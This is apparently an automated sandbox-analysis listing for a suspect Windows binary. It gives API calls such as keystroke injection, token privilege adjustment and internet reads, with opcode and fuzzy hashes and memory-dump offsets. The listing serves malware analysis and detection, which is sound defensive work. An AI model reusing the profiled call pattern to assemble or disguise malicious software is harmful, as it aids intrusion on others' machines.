                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                • String ID:
                                                                                                                • API String ID: 292994002-0
                                                                                                                • Opcode ID: b241ea8ca5b33fc847ffa368ec3f57cfbef26cfda4de83b9cf622f34bd4c9700
                                                                                                                • Instruction ID: df7ead4a3539d5ec07f748d63a2948552cd9a4f747a47e84806afc67fde806ed
                                                                                                                • Opcode Fuzzy Hash: b241ea8ca5b33fc847ffa368ec3f57cfbef26cfda4de83b9cf622f34bd4c9700
                                                                                                                • Instruction Fuzzy Hash: B811E3317482126FEB205F26DC44B2E7B9AFF86761B084429F846D3280DB34DE018AB0
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00DA20EC,?,00DA22E0), ref: 00DA2104
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00DA2116
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetProcessId$kernel32.dll
                                                                                                                • API String ID: 2574300362-399901964
                                                                                                                • Opcode ID: ab2efbeddf65bb14e8c33634e001a255e0717e4392387a8bca64521e5a863cc6
                                                                                                                • Instruction ID: ab1ebb16c0130f44b17c8b7314d012f55779ae72bbfcbdc4b4d6ac5a5f82c894
                                                                                                                • Opcode Fuzzy Hash: ab2efbeddf65bb14e8c33634e001a255e0717e4392387a8bca64521e5a863cc6
                                                                                                                • Instruction Fuzzy Hash: 19D0A7744003138FD7206F66EC0EA2236E4AB04314B19842DE749D1394D770C480CA70
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00D8439C
                                                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00D843B8
                                                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00D84425
                                                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00D84483
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 432972143-0
                                                                                                                • Opcode ID: 2555cad77678ad10ed81e681946858394cd725cc38e830181e53b1c6f6c3d3f6
                                                                                                                • Instruction ID: a4f183dbd2893b3a70b1653705de1aa402d4b8ae88d1e790a95dba31133f3a19
                                                                                                                • Opcode Fuzzy Hash: 2555cad77678ad10ed81e681946858394cd725cc38e830181e53b1c6f6c3d3f6
                                                                                                                • Instruction Fuzzy Hash: 464129B094035AAAEF20AB69D804BFE7BB9AB45715F08015AF4C5932C1C7F4C985D771
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D8221E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: ($|
                                                                                                                • API String ID: 1659193697-1631851259
                                                                                                                • Opcode ID: 35b3873e47128828eb0fc1b838e12f2db0264051cae96caf4f9305cf84b1ba7d
                                                                                                                • Instruction ID: cadd743491b77c22a942fe2d027633b05a1f728aa871b12243567f30d811564d
                                                                                                                • Opcode Fuzzy Hash: 35b3873e47128828eb0fc1b838e12f2db0264051cae96caf4f9305cf84b1ba7d
                                                                                                                • Instruction Fuzzy Hash: ED322375A007059FCB28DF69C491A6AB7F0FF48320B15C46EE49ADB3A1E770E941CB64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D5AE5E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3265722593-0
                                                                                                                • Opcode ID: d6f3b09d8b56cffc7b2c5fc4241fc7aa46305148dfc9591697311aaa5e831526
                                                                                                                • Instruction ID: 59bc7174908264665a491473541fd56eba26a5a39c857c296401a1e8e4f9aa80
                                                                                                                • Opcode Fuzzy Hash: d6f3b09d8b56cffc7b2c5fc4241fc7aa46305148dfc9591697311aaa5e831526
                                                                                                                • Instruction Fuzzy Hash: ABA12960204225FADF28AB2D5C8ADBF399CDF46342B18472AFC83D6191DE25CD099273
                                                                                                                APIs
                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00D94A1E,00000000), ref: 00D955FD
                                                                                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00D95629
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 599397726-0
                                                                                                                • Opcode ID: e01c4accb78d684a13288c9da6a2e885e161d7db98421cbe4edcc2b4976d9cd5
                                                                                                                • Instruction ID: e0d38692d7a424499230af1271f9cecf5e1d661e81de47fe672624f19c2092c9
                                                                                                                • Opcode Fuzzy Hash: e01c4accb78d684a13288c9da6a2e885e161d7db98421cbe4edcc2b4976d9cd5
                                                                                                                • Instruction Fuzzy Hash: 9741F271600609BFEF129E90EC85EBFB7BDEB40318F14407AF606A6185EA709E419B74
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00D8EA95
                                                                                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00D8EAEF
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00D8EB3C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$DiskFreeSpace
                                                                                                                • String ID:
                                                                                                                • API String ID: 1682464887-0
                                                                                                                • Opcode ID: 33a0fa379edc42c46823d6d044b44ce6afef72cd7bbd0fdc4aaf90a368185f46
                                                                                                                • Instruction ID: 24489b02c63fd10aac0e704a738f647cc65b98c1b48d6d34edf2b00f133dcea6
                                                                                                                • Opcode Fuzzy Hash: 33a0fa379edc42c46823d6d044b44ce6afef72cd7bbd0fdc4aaf90a368185f46
                                                                                                                • Instruction Fuzzy Hash: 2C213B35A00209EFCB00EFA5D894AADFBB9FF49310F1480A9E805E7351DB31E905CB60
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
                                                                                                                  • Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D7BF0F
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D7BF3C
                                                                                                                • GetLastError.KERNEL32 ref: 00D7BF49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 1922334811-0
                                                                                                                • Opcode ID: fec51e79803a0abb7ae3494c2d07b1a04b9e596cde656a5925071cf946d19c93
                                                                                                                • Instruction ID: 0a24b9eddd7a48c7cf8085ab10ceb063fd5cabc6a216f4b9e7ff269dd8999df1
                                                                                                                • Opcode Fuzzy Hash: fec51e79803a0abb7ae3494c2d07b1a04b9e596cde656a5925071cf946d19c93
                                                                                                                • Instruction Fuzzy Hash: 75116DB1514305AFD718AF54DCC5D6BFBA9EF44720B20852EE49A97251EB71EC408A30
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D870D8
                                                                                                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00D87115
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00D8711E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 33631002-0
                                                                                                                • Opcode ID: 499c9722326c8014de564b3fcc8b4eb2de6e0c19b06d665d5db3b72f80f8f7c5
                                                                                                                • Instruction ID: 0ecc60a66f7de3367bc45c87da60758ecf4ce6b9c4f6255fb22906bb7e414efa
                                                                                                                • Opcode Fuzzy Hash: 499c9722326c8014de564b3fcc8b4eb2de6e0c19b06d665d5db3b72f80f8f7c5
                                                                                                                • Instruction Fuzzy Hash: 6111A5B190032ABEE7109BA8DC49FAFB7BCEB08754F104555B901E7190D2789E0487F1
                                                                                                                APIs
                                                                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00D7BE5A
                                                                                                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00D7BE71
                                                                                                                • FreeSid.ADVAPI32(?), ref: 00D7BE81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3429775523-0
                                                                                                                • Opcode ID: 06ad269ea5c09015a9440a1ae283b86554263d6546f7a822a82820bc4181238e
                                                                                                                • Instruction ID: 07d96ff9a2b2936809785f18b47b7ba93b3bf203a4d32e8ef736257a1fbced19
                                                                                                                • Opcode Fuzzy Hash: 06ad269ea5c09015a9440a1ae283b86554263d6546f7a822a82820bc4181238e
                                                                                                                • Instruction Fuzzy Hash: 0FF0FF7690030ABBDB04DBE8DD8AEEDBBB9EB08201F104469A602E2291E27056459B20
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNEL32(00D4C848,00D4C848), ref: 00D5DDA2
                                                                                                                • FindFirstFileW.KERNEL32(00D4C848,?), ref: 00DB4A83
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesFindFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 4185537391-0
                                                                                                                • Opcode ID: d8f1037e47c2afa8a4a4cdc56e08bb0cad3513a443c459dbfcfb4512cc4bc28a
                                                                                                                • Instruction ID: 101c878d1a875d7aa6a11e70776e5cde9ceea085dd97357fe10452379d94f94a
                                                                                                                • Opcode Fuzzy Hash: d8f1037e47c2afa8a4a4cdc56e08bb0cad3513a443c459dbfcfb4512cc4bc28a
                                                                                                                • Instruction Fuzzy Hash: EEE0D8314157039B96246738DC0DCE9376D9B0533DB180715FC76C11E0E7709D4489FA
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 394856d6c2ae8cc576fc7e0fb0418e6327c358d1a3a7adabfaf7610038241a13
                                                                                                                • Instruction ID: 06ec81697ef299308b440636e18e71477f30c09c8d74c4becb6b2f274fbd9330
                                                                                                                • Opcode Fuzzy Hash: 394856d6c2ae8cc576fc7e0fb0418e6327c358d1a3a7adabfaf7610038241a13
                                                                                                                • Instruction Fuzzy Hash: E9A21975E0121ACFCB24CF58C480AADBBB1FF49314F29815AE85AAB390D774DD81DB61
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00D8FD71
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00D8FDA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 2295610775-0
                                                                                                                • Opcode ID: 2b71fdf6fe824438c3735630855d124a1adbe3f08e8dd085cb679f682c3ed6d9
                                                                                                                • Instruction ID: ff5231e72240df877c46876c977571b04f214df28149ffd65f364f4e4c68d2de
                                                                                                                • Opcode Fuzzy Hash: 2b71fdf6fe824438c3735630855d124a1adbe3f08e8dd085cb679f682c3ed6d9
                                                                                                                • Instruction Fuzzy Hash: 9B11A1326142019FD700EF28C845A2EB7E9FF84324F04851EF9A9DB391DB30EC058BA1
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00D9C2E2,?,?,00000000,?), ref: 00D8D73F
                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00D9C2E2,?,?,00000000,?), ref: 00D8D751
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479602957-0
                                                                                                                • Opcode ID: 71e780db38ed2e31efa2d39ddbf63fd141e1e4b3d323ff8c877371b9cf18ba79
                                                                                                                • Instruction ID: 459658a551e45cdc576f0714ad015b97dbee1f0459a9e58bee59efd8b5774e15
                                                                                                                • Opcode Fuzzy Hash: 71e780db38ed2e31efa2d39ddbf63fd141e1e4b3d323ff8c877371b9cf18ba79
                                                                                                                • Instruction Fuzzy Hash: BBF0823510032EABDB11AFA4CC49FEA776EEF49361F008125B909D61C1D630D940CBB0
                                                                                                                APIs
                                                                                                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00D84B89
                                                                                                                • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00D84B9C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InputSendkeybd_event
                                                                                                                • String ID:
                                                                                                                • API String ID: 3536248340-0
                                                                                                                • Opcode ID: 03ac6feb7110dec53e12c9d511694c174714196d6ceb53000e0e040b56058efe
                                                                                                                • Instruction ID: ed2a68580e718c2180683ec1cde094b9a807a518a518febe36014fdff7340bb6
                                                                                                                • Opcode Fuzzy Hash: 03ac6feb7110dec53e12c9d511694c174714196d6ceb53000e0e040b56058efe
                                                                                                                • Instruction Fuzzy Hash: F7F0677080038EAFEB059FA4C805BBE7BB4AF04305F04841AF961A6291D379D6129FA0
                                                                                                                APIs
                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00D7B9EC), ref: 00D7B8C5
                                                                                                                • CloseHandle.KERNEL32(?,?,00D7B9EC), ref: 00D7B8D7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 81990902-0
                                                                                                                • Opcode ID: d386d038880e47542160c5a6b41765e34c44d827d12583e5b47bbd7e46559abc
                                                                                                                • Instruction ID: 149bf5949386af05e4af3acaf24b82ae89e6c1a1e21f6205d119fc78e2b7b283
                                                                                                                • Opcode Fuzzy Hash: d386d038880e47542160c5a6b41765e34c44d827d12583e5b47bbd7e46559abc
                                                                                                                • Instruction Fuzzy Hash: 88E0BF71004712AFE7262B54EC05DB77BEAEF053117148569F455C1470D7619C90DB30
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,00D4125D,00D67A43,00D40F35,?,?,00000001), ref: 00D68E41
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00D68E4A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 62dc57c2a1d1f9b8e67eb89acf6a32a97d7a17f6d07ed92d44f3a9b17f9dc5c8
                                                                                                                • Instruction ID: 140e81ac03e2024f5f79a45c54b299fba8e467fa32733cb793b816ba9fb186eb
                                                                                                                • Opcode Fuzzy Hash: 62dc57c2a1d1f9b8e67eb89acf6a32a97d7a17f6d07ed92d44f3a9b17f9dc5c8
                                                                                                                • Instruction Fuzzy Hash: A7B09271044B4AABEA002BA1ED09F887F6AEB48A62F024020FA1D842608B6354508EA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
